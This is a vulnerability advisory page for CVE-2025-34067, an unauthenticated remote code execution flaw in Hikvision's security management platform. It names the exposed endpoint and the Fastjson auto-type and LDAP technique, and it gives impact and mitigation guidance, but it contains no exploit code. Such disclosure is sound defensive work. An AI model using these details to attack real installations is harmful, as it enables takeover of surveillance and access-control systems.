Skip to main content

CVE-2025-34067: CWE-502 Deserialization of Untrusted Data in Hikvision Integrated Security Management Platform

Critical
VulnerabilityCVE-2025-34067cvecve-2025-34067cwe-502cwe-917
Published: Wed Jul 02 2025 (07/02/2025, 13:44:21 UTC)
Source: CVE Database V5
Vendor/Project: Hikvision
Product: Integrated Security Management Platform

Description

An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system.

AI-Powered Analysis

AILast updated: 07/02/2025, 14:10:44 UTC

Technical Analysis

CVE-2025-34067 is a critical unauthenticated remote code execution (RCE) vulnerability affecting Hikvision's HikCentral platform, formerly known as the Integrated Security Management Platform. The vulnerability arises from the use of a vulnerable version of the Fastjson library within the applyCT component, specifically at the endpoint /bic/ssoService/v1/applyCT. Fastjson is a Java library used for JSON parsing and serialization. This vulnerability exploits Fastjson's auto-type feature, which allows dynamic loading of Java classes during deserialization. An attacker can send specially crafted input that triggers the deserialization of untrusted data, referencing malicious Java classes via an LDAP URL. This leads to arbitrary code execution on the underlying system without requiring any authentication or user interaction. The vulnerability is classified under CWE-502 (Deserialization of Untrusted Data) and CWE-917 (Improper Neutralization of Special Elements used in an LDAP Query), highlighting the unsafe deserialization and LDAP injection aspects. The CVSS 4.0 base score is 10.0, indicating a critical severity with network attack vector, no required privileges or user interaction, and high impact on confidentiality, integrity, and availability. No patches or mitigations have been officially released at the time of publication, and there are no known exploits in the wild yet. However, given the nature of the vulnerability and the criticality of the affected platform, exploitation could lead to full system compromise, enabling attackers to manipulate security management functions, access sensitive surveillance data, or disrupt security operations.

Potential Impact

For European organizations, the impact of this vulnerability is significant due to the widespread use of Hikvision's security management solutions in critical infrastructure, government facilities, transportation hubs, and commercial enterprises. Successful exploitation could allow attackers to gain full control over the security management platform, potentially disabling surveillance systems, tampering with access controls, or exfiltrating sensitive video and security data. This could lead to severe breaches of physical security, privacy violations, and operational disruptions. The unauthenticated nature of the vulnerability increases the risk of remote exploitation by threat actors, including cybercriminals and nation-state adversaries. Given the critical role of HikCentral in integrated security environments, the vulnerability could also facilitate lateral movement within networks, enabling further compromise of enterprise IT and OT systems. The potential for widespread impact is heightened by the lack of available patches and the criticality of the CVSS score, necessitating urgent attention by European organizations relying on Hikvision products.

Mitigation Recommendations

1. Immediate network-level mitigation: Restrict external and untrusted network access to the /bic/ssoService/v1/applyCT endpoint using firewalls, network segmentation, or web application firewalls (WAFs). 2. Disable Fastjson auto-type feature if possible by configuring the application or applying custom patches to prevent dynamic class loading during deserialization. 3. Monitor network traffic and logs for suspicious LDAP requests or unusual activity targeting the vulnerable endpoint. 4. Implement strict input validation and filtering at the application layer to block malicious payloads attempting to exploit deserialization. 5. Engage with Hikvision support and monitor official advisories for patches or updates addressing this vulnerability; apply them promptly once available. 6. Conduct a thorough security audit of all Hikvision devices and management platforms to identify exposure and implement compensating controls such as multi-factor authentication and enhanced monitoring. 7. Consider temporary disabling or isolating vulnerable HikCentral instances until a secure patch is deployed. 8. Educate security teams on the indicators of compromise related to Fastjson deserialization attacks to enable rapid detection and response.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
VulnCheck
Date Reserved
2025-04-15T19:15:22.549Z
Cvss Version
4.0
State
PUBLISHED

Threat ID: 68653a166f40f0eb7292c948

Added to database: 7/2/2025, 1:54:30 PM

Last enriched: 7/2/2025, 2:10:44 PM

Last updated: 7/26/2025, 8:42:53 PM

Views: 156

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats